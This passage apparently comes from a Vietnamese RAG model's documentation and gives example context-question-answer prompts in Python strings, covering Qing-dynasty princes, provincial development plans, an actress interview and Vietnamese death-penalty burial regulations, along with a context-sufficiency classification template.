Nếu người dân bình thường muốn làm hoàng đế, vậy thì đó là điều hoàn toàn không thể, nhưng đối với những vương công quý tộc trong hoàng thất mà nói, họ đương nhiên sẽ có rất nhiều cơ hội, đặc biệt là những thân vương nắm đại quyền quân sự , họ chính là mối đe dọa lớn nhất đối với nhà vua. Vì thế, các đời hoàng đế đều sẽ nghĩ đủ mọi cách để áp chế, kiểm soát họ, tránh việc họ khởi binh tạo phản. Triều Thanh có lịch sử hơn 300 năm, cũng đã cho ra đời vô số thân vương, đặc biệt là cuối thời Thanh, khi Trung Quốc rơi vào cảnh khốn khó, sau khi Từ Hy Thái Hậu cầm quyền thì thế cục này càng được thể hiện rõ rệt hơn. Nhưng cho dù là một người phụ nữ cầm quyền thì cũng chẳng có một vị thân vương hoàng tộc nào đứng ra tạo phản. Có 3 nguyên nhân sau: Thứ nhất, thân vương triều Thanh không thể nối ngôi, nếu muốn tiếp tục duy trì danh phận thân vương, vậy thì bắt buộc phải có được sự đồng ý của hoàng đế và phải lập được công lao cho đất nước. Thứ hai, triều đình tiến hành giám sát nghiêm ngặt đối với các thân vương, họ không hề có cơ hội để tạo phản. Thứ ba, các thân vương không thể giao thiệp quá sâu với các đại thần, quan lại khác, điều này cũng khiến các thân vương rơi vào cảnh bị cô lập, thế nên càng không có cơ hội để cấu kết với người khác hòng tạo phản. - Video: Ngắm sự kỳ vĩ và lộng lấy của Tử Cấm Thành từ trên cao. Nguồn: Sky Eye.
- Ngữ cảnh 3: . Cùng điều chỉnh với con là điều rất quan trọng bởi vì trẻ sẽ tự tin để tự đặt những giới hạn cho chính mình khi lớn lên”, TS Nguyễn Thị Thanh đưa ra lời khuyên. “Khi con mắc sai lầm, hãy giúp chúng tìm những cách khác tốt hơn. Đơn cử dùng hậu quả để dạy cho chúng bài học, điều đó tốt hơn rất nhiều việc xử phạt. Nếu cha mẹ chỉ biết trừng phạt, sẽ nhận được lời xin lỗi nhưng không thể giúp trẻ tỉnh ngộ. Bởi chúng chỉ biết được mình đã sai mà không biết sai ở chỗ nào và làm thế nào mới là đúng”
- Ngữ cảnh 4: . “MẤT ĐI CHA MẸ Ở TUỔI ĐẸP NHẤT CỦA NGƯỜI PHỤ NỮ CÀNG KHIẾN TÔI PHẢI MẠNH MẼ” - Làm con của nghệ sĩ Thanh Hiền, Đinh Y Nhung cảm nhận sợi dây liên kết giữa hai mẹ con thế nào? Má Thanh Hiền là người rất tuyệt vời. Hai má con hồi xưa từng làm phim truyền hình với nhau rồi, cho nên khi tái hợp thì không mấy bỡ ngỡ. Khi đối diễn, hai má con rất ăn ý, như người thân ruột thịt vậy đó. - Khi thể hiện những phân cảnh cảm động trong phim, có khi nào chị thấy nhớ mẹ không? Có chứ, nhất là ở những phân đoạn gia đình sum họp, tự nhiên mình bị buồn. Ai cũng muốn có cha, có mẹ, ai cũng muốn Tết được chạy về bên gia đình. Trong mười mấy, hai chục năm qua, Nhung bị chạnh lòng. Tuy nhiên, chỉ trong tích tắc, tôi tự trấn an rằng, mình đang quay phim, đang hóa thân vào nhân vật nên không thể xao lãng được. Mình là con người mà, cũng có lúc tâm trạng vui buồn bất chợt, nhưng Nhung luôn cố gắng lấy lại phong độ liền. - Mất ba mẹ từ sớm, không có chỗ dựa tinh thần, cô gái trẻ Đinh Y Nhung năm đó có nhận những lời mời gọi khiếm nhã không? Trước đây, Nhung không có bạn bè nhiều, chủ yếu chỉ lo đi học, đi làm để lo cho cuộc sống thôi. Nên Nhung không phải đón nhận những lời mời gọi nào hết. - Mất mát từ quá khứ có ảnh hưởng gì đến suy nghĩ về tương lai của chị sau này, ví dụ khi có con thì sẽ bù đắp, chăm sóc cho con nhiều hơn? Năm ba mẹ mất thì mình vẫn còn khá trẻ, thật ra cái tuổi đó là tuổi đẹp của người phụ nữ. Sau đó, tôi đi làm, rồi yêu đương và lập gia đình. Có rất nhiều thứ hối tiếc để nói về Nhung của thời điểm đó. Thứ nhất là mình chưa thành công, thứ hai là mình chưa trả hiếu cho cha mẹ, thứ ba là mình còn bấp bênh. Nhung lúc đó lì lợm lắm, không cho phép mình ngã, bằng mọi giá phải tiến về trước dù có hàng ngàn chông gai ngăn cản. Có lúc tôi bị người này cười, người kia mỉa, nhưng mà mình vẫn cố bước đi. Người ta có cười thì cũng không mang lại cho mình được gì, tôi chỉ biết làm hết khả năng để lo cho bản thân, lo cho em của mình. Hiện, con cái Nhung đã đi nước ngoài rồi. Bé đang học đại học về âm nhạc, còn em mình cũng đã lớn rồi. Đối với Nhung ngay lúc này thì không phải thành công hay hoàn hảo lắm, nhưng ít nhất là tôi đã cố gắng để tự chịu trách nhiệm với cuộc đời mình. Mất cha, mất mẹ, đối với một người hai mươi mấy tuổi thì điều cần nhất lúc đó là có được gia đình ở bên. Nhưng mình không có chỗ dựa tinh thần thì càng phải mạnh mẽ hơn nữa. Tôi tự gặm nhấm nỗi đau mất người thân trong một thời gian dài, có khi đến cả bạn bè cũng không hề biết. Một thời gian sau, bạn bè thời và mọi người mới biết. Còn người hâm mộ, đồng nghiệp trong nghề gần như không biết chuyện ba mẹ Nhung mất sớm, chỉ có vài người chơi thân với nhau biết thôi. Sau này, dần dần tâm lý dần ổn định thì mình mới bắt đầu chia sẻ. “CON ĐI DU HỌC, TÔI DẶN BÉ CÁI GÌ KHÔNG TỐT THÌ MÌNH BỎ QUA” - Đinh Y Nhung từng tiết lộ mình rất thân với con gái. Có vẻ như quyết định để con đi du học là không hề dễ dàng? Thật sự là không có ba mẹ nào muốn con mình đi xa, nhưng việc du học lại là quyết định của bé. Con Nhung bày tỏ muốn học đại học ở nước ngoài và muốn đi sớm để thực hiện ước mơ. Nhưng lúc đó con còn nhỏ quá, phải đợi đến năm con 17 tuổi thì Nhung mới quyết định cho bạn nhỏ đi. Con cái từ nhỏ ở với bố mẹ giờ lại đi xa thì tất nhiên người làm cha làm mẹ cùng phải thấy sốc, thấy buồn. Nhưng Nhung hoàn toàn tôn trọng quyết định của con về việc chọn ngành nghề và tương lai của mình. Ba mẹ sẽ đứng sau và là người đưa cho con những lời khuyên và chỉ có thể đồng hành cùng con tới một mốc thời gian nào đó. 
Về sau, con phải đi làm và tự có trách nhiệm với cuộc đời của mình. - Có con gái đang ở tuổi lớn lại xa bố mẹ và tiếp xúc một nền văn hóa phương Tây cởi mở, Đinh Y Nhung đã khuyên dạy và đồng hành với con như thế nào? Ngay khi ở Việt Nam, con gái Nhung đã được theo học trường quốc tế. Hai mẹ con cũng có rất nhiều dịp để tâm sự và chia sẻ với nhau. Ngay từ nhỏ, Nhung đã cho bé được tiếp xúc song song giữa hai nền văn hóa để con không bỡ ngỡ. Mình là người Việt nên đương nhiên vẫn dạy con theo văn hóa Á Đông là chủ yếu. Nhung vẫn luôn tạo điều kiện để con cảm nhận những nét đẹp trong nền văn hóa quê hương. Văn hóa phương Tây thì xa lạ hơn nhưng Nhung cũng khuyên con rằng điều gì hay thì mình học hỏi, cái gì không tốt thì mình nên bỏ qua. Tất nhiên mình không thể theo sát con, nhất là khi bé đang ở độ tuổi mới lớn, có nhiều sự hiếu kỳ. Tuy nhiên, Nhung cũng không quá lo lắng vì qua quá trình học tập ở các trường quốc tế, bé cùng đã được làm quen dần với văn hóa phương Tây. Bé muốn làm bạn với mẹ nên có nhiều thứ bé muốn hỏi, muốn tiếp thu thì hai mẹ con lại ngồi xuống chia sẻ, tâm sự với nhau. Nhung tin, con luôn tỉnh táo để đưa ra những quyết định cho bản thân mình. Nhung không dám nói trước, nhưng hiện tại con vẫn luôn biết nói cảm ơn, xin phép trước khi làm bất cứ điều gì nên mình vẫn rất tin tưởng con. - Chị nhận xét thế nào về tính cách của con gái? Phải chăng bé là phiên bản nhí của chị? Con gái Nhung có nhiều nét giống mẹ.
- Ngữ cảnh 5: . - Trong quá trình quay phim, má Hiền có tham gia đóng góp ý kiến cho dàn diễn viên trẻ không? Không phải má Hiền muốn làm thầy nhưng có những lúc cũng lên tiếng góp ý một vài điều. Những lúc như thế các bạn diễn viên trẻ cũng nghe theo. Phải giúp đỡ nhau như vậy mới có thể tạo ra được một tác phẩm hay. Chứ có nhiều diễn viên trẻ có lòng tự trọng cao, chỉ khi đạo diễn nói mới nghe thì không bao giờ có thể tiến bộ được. Má Hiền phải cảm thấy hạnh phúc mới đúng, càng ngày xung quanh càng có nhiều bạn bè, các mối quan hệ nhờ đó mà cũng ngày càng đông. Ngày xưa, khi tham gia là Mùi Ngò Gai chưa có ai biết nhưng sau khi phim phát sóng mọi người đã nhớ đến má. Hiện tại, má Hiền đã được đạo diễn, nhà sản xuất mời đóng phim đó đã là một niềm hạnh phúc. Đi ra đường hay đi khám bệnh, người ta cứ vây xung quanh quan tâm hỏi han khiến má cảm thấy rất vui lắm (cười). Cảm ơn nghệ sĩ Thanh Hiền đã nhận lời tham gia phỏng vấn với SAOstar. Chúc má có nhiều sức khỏe để tiếp tục làm nghề!'''
question = '''Tại sao các thân vương triều Thanh không dám tạo phản mặc dù có nhiều quyền lực và cơ hội?'''
'''Trả lời:
Các thân vương triều Thanh không dám tạo phản mặc dù có nhiều quyền lực và cơ hội vì có ba lý do chính:
1. **Không thể nối ngôi**: Để duy trì danh phận thân vương, họ phải có sự đồng ý của hoàng đế và phải lập được công lao cho đất nước. Điều này hạn chế cơ hội của họ để trở thành hoàng đế.
2. **Giám sát nghiêm ngặt**: Triều đình tiến hành giám sát nghiêm ngặt đối với các thân vương, không cho họ cơ hội để tạo phản.
3. **Bị cô lập**: Các thân vương không thể giao thiệp quá sâu với các đại thần, quan lại khác, điều này khiến họ bị cô lập và không có cơ hội cấu kết với người khác để tạo phản.'''
```
#### 3. Negative rejection
```python
context = '''- Ngữ cảnh 1: Thái Bình hướng đến là trung tâm công nghiệp, năng lượng của vùng Với tiềm năng sẵn có, quy hoạch tỉnh Thái Bình thời kỳ 2021-2030, tầm nhìn đến năm 2050 xác định tỉnh sẽ phát triển công nghiệp theo hướng hiện đại, bền vững dựa trên nghiên cứu phát triển điện gió, điện khí, cân bằng lượng phát thải. Sáng 5/3, UBND tỉnh Thái Bình tổ chức Hội nghị công bố quy hoạch của tỉnh thời kỳ 2021-2030, tầm nhìn đến năm 2050 và xúc tiến đầu tư tỉnh Thái Bình. Phát biểu tại hội nghị, Phó Chủ tịch Thường trực UBND tỉnh Nguyễn Quang Hưng cho biết: Mục tiêu của quy hoạch là đến năm 2030, Thái Bình trở thành địa phương thuộc nhóm phát triển khá và là một trong những trung tâm phát triển công nghiệp của vùng Đồng bằng sông Hồng, có cơ cấu kinh tế hiện đại với công nghiệp là động lực chủ yếu cho tăng trưởng để Thái Bình phát triển nhanh, toàn diện và bền vững. Đến năm 2050, Thái Bình là tỉnh phát triển của vùng Đồng bằng sông Hồng, tăng trưởng kinh tế dựa trên nền tảng khoa học công nghệ, đổi mới sáng tạo và các ngành kinh tế trụ cột có sức cạnh tranh cao. Quy hoạch tỉnh đã xác định 4 trụ cột tăng trưởng, 3 khâu đột phá, 4 không gian kinh tế - xã hội, 3 hành lang kinh tế, định hướng phát triển các ngành và lĩnh vực và 6 nhiệm vụ trọng tâm. Quy hoạch tỉnh cũng có nhiều điểm mới, đột phá như mở ra không gian phát triển mới thông qua hoạt động “lấn biển”, tạo quỹ đất cho các hoạt động chức năng, hình thành không gian công nghiệp - đô thị - dịch vụ. Về hạ tầng giao thông, Thái Bình sẽ đầu tư 3 tuyến cao tốc là cao tốc Ninh Bình - Hải Phòng (CT.08), đường vành đai 5 - Hà Nội (CT.39) và tuyến CT.16 kết nối Khu kinh tế với thành phố Thái Bình và vùng kinh tế phía Tây Bắc Thủ đô. Tỉnh cũng sẽ đầu tư 101km đường sắt, khổ đường dự kiến rộng 1.435 mm và sân bay chuyên dụng nằm ở ven biển Thái Bình. Về phát triển kinh tế, quy hoạch tỉnh Thái Bình xác định tỉnh sẽ phát triển công nghiệp theo hướng hiện đại, công nghệ tiên tiến, giá trị gia tăng cao, tham gia sâu, toàn diện vào mạng lưới sản xuất, chuỗi giá trị toàn cầu, phát huy các tiềm năng, thế mạnh để đưa Thái Bình trở thành một trong những trung tâm phát triển công nghiệp, năng lượng của vùng Đồng bằng sông Hồng. Tỉnh khuyến khích đầu tư phát triển các ngành có thế mạnh và có thể tạo đột phá như năng lượng, cơ khí chế biến, chế tạo, công nghiệp công nghệ cao, điện - điện tử, chế biến sản phẩm nông, lâm nghiệp và thủy sản… Đồng thời, tập trung nghiên cứu phát triển điện gió, điện khí để tạo nguồn điện sạch và cân bằng lượng phát thải, nghiên cứu đầu tư xây dựng nhà máy chế biến Condensate, chuẩn bị mọi điều kiện để xây dựng và đưa vào vận hành Nhà máy nhiệt điện LNG Thái Bình. Về nông nghiệp, tỉnh Thái Bình vẫn xác định đây là \"trụ cột quan trọng\" trong phát triển kinh tế của tỉnh, góp phần bảo đảm an ninh lương thực quốc gia, hướng tới trở thành trung tâm sản xuất nông nghiệp hàng đầu của Đồng bằng sông Hồng. Phát biểu tại hội nghị, Phó Thủ tướng Chính phủ Trần Lưu Quang đánh giá Thái Bình có 4 tiềm năng, lợi thế lớn để có thể có sự bứt phá trong thời gian tới như vị trí địa lý và tiếp cận đất đai thuận lợi; từng là địa phương đi đầu trong xây dựng nông thôn mới bài bản và nghiêm túc, nhận được sự quan tâm của nhiều thế hệ lãnh đạo Đảng, Nhà nước và có nhiều doanh nhân người Thái Bình và luôn hướng về quê hương; có sự đoàn kết, thống nhất, trước hết là trong tập thể lãnh đạo. 
Về vị trí địa lý và tiếp cận đất đai, Phó Thủ tướng cho rằng trong tương lai, khi Luật Đất đai có hiệu lực, Thái Bình sẽ có nhiều điều kiện lấn biển để triển khai các dự án khu đô thị, khu công nghiệp thân thiện với môi trường. Đối với nông nghiệp, Phó Thủ tướng nhấn mạnh về lâu dài Thái Bình có thể ghi điểm từ phát triển công nghiệp nhưng trước mắt, đặc biệt trong lúc khó khăn thì nông nghiệp vẫn là nền tảng rất quý giá. Mặt khác, ứng dụng của công nghệ cao trong sản xuất nông nghiệp sẽ rút ngắn thời gian làm đồng của người nông dân, tạo điều kiện để Thái Bình huy động nguồn nhân lực trong nông nghiệp sang phát triển các ngành công nghiệp và dịch vụ, một lợi thế mà không phải địa phương nào cũng có được như Thái Bình. Bên cạnh những lợi thế trên, lãnh đạo Chính phủ chỉ ra một số khó khăn mà tỉnh phải đối mặt như Thái Bình đã sử dụng hết 1.600 ha chỉ tiêu đất công nghiệp trong giai đoạn này, đòi hỏi phải có phương án giải quyết thấu đáo trong thời gian tới để tỉnh tiếp tục phát triển công nghiệp. Đồng thời, Thái Bình cũng phải cạnh tranh với những địa phương như Hải Phòng, Quảng Ninh trong thu hút FDI trong khi phát triển cơ sở hạ tầng chưa theo kịp mong muốn. Do vậy, khi triển khai quy hoạch tỉnh, Phó Thủ tướng nhắn nhủ tới địa phương 8 chữ: Tuân thủ, linh hoạt, đồng bộ và thấu hiểu. Đồng thời, tỉnh cũng phải \"linh hoạt\" trong tổ chức thực hiện, trong trường hợp cá biệt cụ thể, điều chỉnh mục tiêu cho phù hợp. Sáng cùng ngày, Phó Thủ tướng Trần Lưu Quang đã dự Lễ khởi công dự án Nhà máy Pegavision Việt Nam tại khu công nghiệp Liên Hà Thái, huyện Thái Thụy, tỉnh Thái Bình
- Ngữ cảnh 2: Bình Định được định hướng là trung tâm khoa học, công nghệ đổi mới sáng tạo Tỉnh Bình Định được định hướng phát triển ngành công nghiệp phát triển theo hướng hiện đại, quy mô lớn, trở thành một trong những trung tâm công nghiệp chế biến chế tạo và công nghệ cao của vùng Bắc Trung Bộ và duyên hải Trung Bộ. Theo Quy hoạch tỉnh Bình Định thời kỳ 2021 - 2030, tầm nhìn đến năm 2050 vừa được Thủ tướng Chính phủ phê duyệt, tỉnh Bình Định được định hướng phát triển ngành công nghiệp phát triển theo hướng hiện đại, quy mô lớn, trở thành một trong những trung tâm công nghiệp chế biến chế tạo và công nghệ cao của vùng Bắc Trung Bộ và duyên hải Trung Bộ. Ngành công nghiệp tăng trưởng nhanh, bền vững, hướng tới tăng trưởng xanh, kinh tế tuần hoàn là trụ cột để phát triển và chuyển dịch cơ cấu kinh tế của tỉnh. Ngành chế biến, chế tạo công nghệ cao (dịch chuyển ngành công nghiệp chế biến, chế tạo sang lĩnh vực sản xuất có giá trị gia tăng cao như: chế biến sâu nông - thủy - hải sản, linh kiện điện tử, bán dẫn, dược phẩm), công nghệ thông tin, trí tuệ nhân tạo trở thành một trong những lĩnh vực đột phá, góp phần đưa tỉnh Bình Định trở thành một trung tâm khoa học, công nghệ đổi mới sáng tạo của vùng và cả nước. Quy hoạch tỉnh Bình Định thời kỳ 2021 - 2030, tầm nhìn đến năm 2050 đặt ra yêu cầu tỉnh này phải chú trọng thu hút đầu tư phát triển năng lượng tái tạo, năng lượng sạch như điện gió ven bờ, điện gió ngoài khơi, điện mặt trời, điện sinh khối và nguồn năng lượng mới (hydrogen/amoniac xanh…); các dự án sản xuất thép quy mô lớn, đóng tàu, sản xuất thiết bị phụ trợ điện gió có công nghệ tiên tiến để nâng cấp xây dựng hạ tầng kỹ thuật sản xuất, thúc đẩy chuyển dịch kinh tế. Quy hoạch tỉnh Bình Định thời kỳ 2021 - 2030, tầm nhìn đến năm 2050 cũng đặt ra mục tiêu đến năm 2030, Bình Định trở thành tỉnh phát triển thuộc nhóm dẫn đầu vùng Bắc Trung Bộ và duyên hải Trung Bộ, là trung tâm công nghiệp chế biến, chế tạo, dịch vụ, du lịch và văn hóa phía Nam của vùng; trung tâm lớn của cả nước về phát triển kinh tế biển; trọng điểm du lịch quốc gia và quốc tế với hệ thống kết cấu hạ tầng kinh tế đồng bộ, hiện đại; kinh tế của tỉnh phát triển nhanh, bền vững và xanh dựa trên các trụ cột tăng trưởng công nghiệp, dịch vụ du lịch, cảng biển - logistics; nông nghiệp ứng dụng công nghệ cao; đô thị hóa; thực hiện thành công các mục tiêu chuyển đổi số, đổi mới sáng tạo, cải thiện mạnh mẽ môi trường đầu tư kinh doanh, trở thành điểm đến đầu tư hấp dẫn của các doanh nghiệp lớn trong và ngoài nước; chỉ số năng lực cạnh tranh cấp tỉnh thuộc nhóm cao của cả nước; kết cấu hạ tầng kinh tế - xã hội đồng bộ, hiện đại, hệ thống đô thị phát triển theo hướng đô thị thông minh, kết nối thuận tiện với các trung tâm kinh tế của vùng, cả nước và quốc tế.
- Ngữ cảnh 3: . Chủ tịch UBND tỉnh Quảng Ninh cho biết, tỉnh đặt mục tiêu hướng đến năm 2030 trở thành một tỉnh tiêu biểu của cả nước về mọi mặt; tỉnh kiểu mẫu giàu đẹp, văn minh, hiện đại, nâng cao đời sống mọi mặt của nhân dân; cực tăng trưởng của khu vực phía Bắc, một trong những trung tâm phát triển năng động, toàn diện; trung tâm du lịch quốc tế, trung tâm kinh tế biển, cửa ngõ của Vùng kinh tế trọng điểm Bắc Bộ và cả nước. Để đạt được những mục tiêu trên, tỉnh Quảng Ninh xác định sự đóng góp, quan tâm của cộng đồng doanh nghiệp, nhất là các doanh nghiệp hàng đầu Việt Nam “các sếu đầu đàn” là một trong những yếu tố then chốt quyết định. Do vậy, tỉnh Quảng Ninh rất mong nhận được sự quan tâm, nghiên cứu đầu tư hợp tác của các Doanh nghiệp hàng đầu Việt Nam trong thời gian tới, nhất là trong việc đầu tư các dự án có hàm lượng công nghệ cao, công nghệ tiên tiến, quản trị hiện đại, giá trị gia tăng cao, có tác động lan tỏa. Tỉnh Quảng Ninh cam kết tạo điều kiện thuận lợi nhất cho doanh nghiệp phát triển hơn nữa khi đầu tư kinh doanh trên địa bàn tỉnh; cam kết đồng hành, lắng nghe tiếng nói của cộng đồng doanh nghiệp, các nhà đầu tư; cùng trăn trở, trách nhiệm, giải quyết thấu đáo, vào cuộc thực chất, hiệu quả đối với từng khó khăn, vướng mắc với mục tiêu tăng cường niềm tin và nâng cao sự hài lòng của cá nhân, tổ chức, doanh nghiệp là thước đo đánh giá chất lượng phục vụ, chất lượng điều hành của cơ quan hành chính nhà nước từ cấp tỉnh đến các cấp cơ sở. Tỉnh Quảng Ninh sẽ triển khai một cách hiệu quả nhất Quy hoạch tỉnh, quy hoạch các địa phương; chuẩn bị mặt bằng sạch; quỹ đất tái định cư; đảm bảo nguồn cung điện, nước và viễn thông theo yêu cầu; xây dựng các chính sách đột phá để thu hút nguồn nhân lực chất lượng cao thông qua việc cải thiện nhà ở và cơ sở văn hóa để đảm bảo đời sống vật chất và tinh thần cho người lao động. Đồng thời bảo vệ quyền và lợi ích chính đáng, hợp pháp của nhà đầu tư, doanh nghiệp vào tỉnh; bảo đảm hài hòa lợi ích giữa nhà nước, nhà đầu tư, người lao động và người dân.'''
question = '''Theo quy hoạch tỉnh Tây Ninh thời kỳ 2021 - 2030, tầm nhìn đến năm 2050, tỉnh sẽ tập trung phát triển công nghiệp và dịch vụ du lịch. Trong bối cảnh cạnh tranh với các tỉnh lân cận, yếu tố nào được coi là quan trọng nhất để Tây Ninh có thể thu hút đầu tư và phát triển nhanh, toàn diện và bền vững?'''
'''Trả lời:
Trong ngữ cảnh được cung cấp, không có thông tin về quy hoạch tỉnh Tây Ninh thời kỳ 2021 - 2030, tầm nhìn đến năm 2050. Do đó, không có câu trả lời chính xác dựa trên các thông tin đã cung cấp. Nếu bạn có thêm thông tin về quy hoạch tỉnh Tây Ninh, vui lòng cung cấp để tôi có thể trả lời câu hỏi một cách chính xác và đầy đủ.
'''
```
#### 4. Information integration
```python
context = '''- Ngữ cảnh 1: 43/2020/nđ-cp Điều 3. Chế độ, chính sách đối với người tham gia thi hành án tử hình\n1. Người tham gia Đội thi hành án tử hình được hưởng chế độ bồi dưỡng bằng ba lần mức lương cơ sở khi thi hành án tử hình đối với 01 người và nghỉ dưỡng 10 ngày theo quy định chung về chế độ nghỉ dưỡng đối với cán bộ, chiến sĩ Công an nhân dân, Quân đội nhân dân.\n2. Người tham gia Hội đồng thi hành án tử hình, cán bộ quản giáo, người ghi âm, ghi hình, chụp ảnh, phiên dịch, thực hiện lăn tay người bị thi hành án tử hình, khâm liệm, mai táng tử thi được hưởng chế độ bồi dưỡng bằng một lần mức lương cơ sở khi thi hành án tử hình đối với 01 người.\n3. Người tham gia bảo đảm an ninh, trật tự; đại diện Ủy ban nhân dân cấp xã; Điều tra viên được hưởng chế độ bồi dưỡng bằng một phần hai mức lương cơ sở khi thi hành án tử hình đối với 01 người.
- Ngữ cảnh 2: 53/2010/qh12 Điều 60. Giải quyết việc xin nhận tử thi, hài cốt của người bị thi hành án tử hình\n1. Việc giải quyết nhận tử thi được thực hiện như sau:\na) Trước khi thi hành án tử hình, thân nhân hoặc người đại diện hợp pháp của người chấp hành án được làm đơn có xác nhận của Ủy ban nhân dân cấp xã nơi cư trú gửi Chánh án Tòa án đã xét xử sơ thẩm đề nghị giải quyết cho nhận tử thi của người chấp hành án để an táng; trường hợp người chấp hành án là người nước ngoài thì đơn phải có xác nhận của cơ quan có thẩm quyền hoặc cơ quan đại diện ngoại giao tại Việt Nam của nước mà người chấp hành án mang quốc tịch và phải được dịch ra tiếng Việt. Đơn phải ghi rõ họ tên, địa chỉ người nhận tử thi, quan hệ với người chấp hành án; cam kết bảo đảm yêu cầu về an ninh, trật tự, vệ sinh môi trường và tự chịu chi phí;\nb) Chánh án Tòa án đã xét xử sơ thẩm thông báo bằng văn bản cho người có đơn đề nghị về việc cho nhận tử thi hoặc không cho nhận tử thi khi có căn cứ cho rằng việc nhận tử thi ảnh hưởng đến an ninh, trật tự, vệ sinh môi trường. Trường hợp người chấp hành án là người nước ngoài, thì Chánh án Tòa án đã xét xử sơ thẩm có trách nhiệm thông báo bằng văn bản cho Bộ Ngoại giao Việt Nam để thông báo cho cơ quan có thẩm quyền hoặc cơ quan đại diện ngoại giao tại Việt Nam của nước mà người đó mang quốc tịch;\nc) Cơ quan thi hành án hình sự Công an cấp tỉnh, cơ quan thi hành án hình sự cấp quân khu có trách nhiệm thông báo cho người có đơn đề nghị ngay sau khi thi hành án để đến nhận tử thi về an táng. Việc giao nhận tử thi phải được thực hiện trong thời hạn 24 giờ kể từ khi thông báo và phải lập biên bản, có chữ ký của các bên giao, nhận; hết thời hạn này mà người có đơn đề nghị không đến nhận tử thi thì cơ quan thi hành án hình sự Công an cấp tỉnh, cơ quan thi hành án hình sự cấp quân khu có trách nhiệm an táng.\n2. Trường hợp không được nhận tử thi hoặc thân nhân của người bị thi hành án không có đơn đề nghị được nhận tử thi về an táng thì cơ quan thi hành án hình sự Công an cấp tỉnh, cơ quan thi hành án hình sự cấp quân khu tổ chức việc an táng. Sau 03 năm kể từ ngày thi hành án, thân nhân hoặc đại diện hợp pháp của người đã bị thi hành án được làm đơn có xác nhận của Ủy ban nhân dân cấp xã nơi cư trú đề nghị Cơ quan thi hành án hình sự Công an cấp tỉnh, cơ quan thi hành án hình sự cấp quân khu nơi đã thi hành án cho nhận hài cốt. Đơn đề nghị phải ghi rõ họ tên, địa chỉ người nhận hài cốt, quan hệ với người bị thi hành án; cam kết bảo đảm yêu cầu về an ninh, trật tự, vệ sinh môi trường và tự chịu chi phí. Trong thời hạn 07 ngày, kể từ ngày nhận được đơn, cơ quan thi hành án hình sự Công an cấp tỉnh, cơ quan thi hành án hình sự cấp quân khu có trách nhiệm xem xét, giải quyết.\nTrường hợp người bị thi hành án là người nước ngoài thì đơn đề nghị phải có xác nhận của cơ quan có thẩm quyền hoặc cơ quan đại diện ngoại giao tại Việt Nam của nước mà người bị thi hành án mang quốc tịch và phải được dịch ra tiếng Việt. Việc giải quyết cho nhận hài cốt do cơ quan quản lý thi hành án hình sự xem xét, quyết định.
- Ngữ cảnh 3: 53/2010/qh12 Điều 57. Chế độ quản lý giam giữ, ăn, ở, mặc, sinh hoạt, gửi và nhận thư, nhận đồ vật, tiền mặt, gặp thân nhân, chăm sóc y tế\nChế độ quản lý giam giữ, ăn, ở, mặc, sinh hoạt, gửi và nhận thư, nhận đồ vật, tiền mặt, gặp thân nhân, chăm sóc y tế đối với người bị kết án tử hình trong thời gian chờ thi hành án thực hiện theo quy định của pháp luật về tạm giam.
- Ngữ cảnh 4: 82/2011/nđ-cp Điều 9. Chi phí mai táng\nChi phí mai táng người bị thi hành án tử hình bao gồm: 01 quan tài bằng gỗ thường, 01 bộ quần áo thường, 04 m vải liệm, hương, nến, rượu, cồn để làm vệ sinh khi liệm tử thi và các chi phí mai táng khác.\nTrường hợp thân nhân hoặc người đại diện hợp pháp của người bị kết án tử hình được nhận tử thi về mai táng thì phải tự chịu chi phí đưa di chuyển tử thi và phải cam kết chấp hành đúng quy định của pháp luật về bảo đảm an ninh, trật tự.
- Ngữ cảnh 5: 82/2011/nđ-cp Điều 5. Chế độ, chính sách đối với người tham gia thi hành án tử hình\n1. Người tham gia Đội thi hành án tử hình và bác sĩ xác định tĩnh mạch được hưởng chế độ bồi dưỡng bằng hai lần mức lương tối thiểu chung cho mỗi lần thi hành án và được nghỉ dưỡng 10 ngày theo quy định chung về chế độ nghỉ dưỡng đối với cán bộ, chiến sĩ Công an nhân dân, Quân đội nhân dân.\n2. Người tham gia Hội đồng thi hành án tử hình, bác sĩ pháp y, cán bộ chuyên môn, người thực hiện lăn tay người bị thi hành án tử hình, khâm liệm, an táng tử thi được hưởng chế độ bồi dưỡng bằng một lần mức lương tối thiểu chung quy định cho mỗi lần thi hành án.\n3. Những người tham gia khác được hưởng chế độ bồi dưỡng bằng một phần hai mức lương tối thiểu cho mỗi lần thi hành án.'''
question = '''Tử tù chết sau khi tiêm thuốc độc mà không có thân nhân nhận xác thì được hỗ trợ mai táng như thế nào?'''
'''Trả lời:
Dựa trên ngữ cảnh 2 (53/2010/qh12 Điều 60), nếu tử tù chết sau khi tiêm thuốc độc mà không có thân nhân nhận xác, thì cơ quan thi hành án hình sự Công an cấp tỉnh hoặc cơ quan thi hành án hình sự cấp quân khu sẽ tổ chức việc an táng. Cụ thể:
1. **An táng**: Cơ quan thi hành án hình sự Công an cấp tỉnh hoặc cơ quan thi hành án hình sự cấp quân khu sẽ chịu trách nhiệm an táng tử tù nếu không có thân nhân hoặc người đại diện hợp pháp đề nghị nhận tử thi.
2. **Hài cốt sau 3 năm**: Sau 3 năm kể từ ngày thi hành án, nếu thân nhân hoặc đại diện hợp pháp của người đã bị thi hành án vẫn chưa đề nghị nhận hài cốt, họ có thể làm đơn đề nghị Cơ quan thi hành án hình sự Công an cấp tỉnh hoặc cơ quan thi hành án hình sự cấp quân khu nơi đã thi hành án cho nhận hài cốt. Đơn đề nghị phải ghi rõ họ tên, địa chỉ người nhận hài cốt, quan hệ với người bị thi hành án, cam kết bảo đảm yêu cầu về an ninh, trật tự, vệ sinh môi trường và tự chịu chi phí.
3. **Chi phí mai táng**: Theo ngữ cảnh 4 (82/2011/nđ-cp Điều 9), chi phí mai táng bao gồm:
- 01 quan tài bằng gỗ thường.
- 01 bộ quần áo thường.
- 04 m vải liệm.
- Hương, nến, rượu, cồn để làm vệ sinh khi liệm tử thi.
- Các chi phí mai táng khác.
Nếu thân nhân hoặc người đại diện hợp pháp đề nghị nhận tử thi về mai táng, họ phải tự chịu chi phí đưa di chuyển tử thi và cam kết chấp hành đúng quy định của pháp luật về bảo đảm an ninh, trật tự.
'''
```
- Context 2 and context 4 contain the information needed to answer the question.
#### 5. Positive/negative identification
```python
system_prompt = "Bạn là một trợ lí Tiếng Việt nhiệt tình và trung thực. Hãy luôn trả lời một cách hữu ích nhất có thể."
template = '''Hãy xác định xem ngữ cảnh có chứa đầy đủ thông tin để trả lời câu hỏi hay không.
Chỉ cần đưa ra 1 trong 2 đáp án trong phần trả lời là "Có" hoặc "Không".
### Ngữ cảnh :
{context}
### Câu hỏi :
{question}
### Trả lời :'''
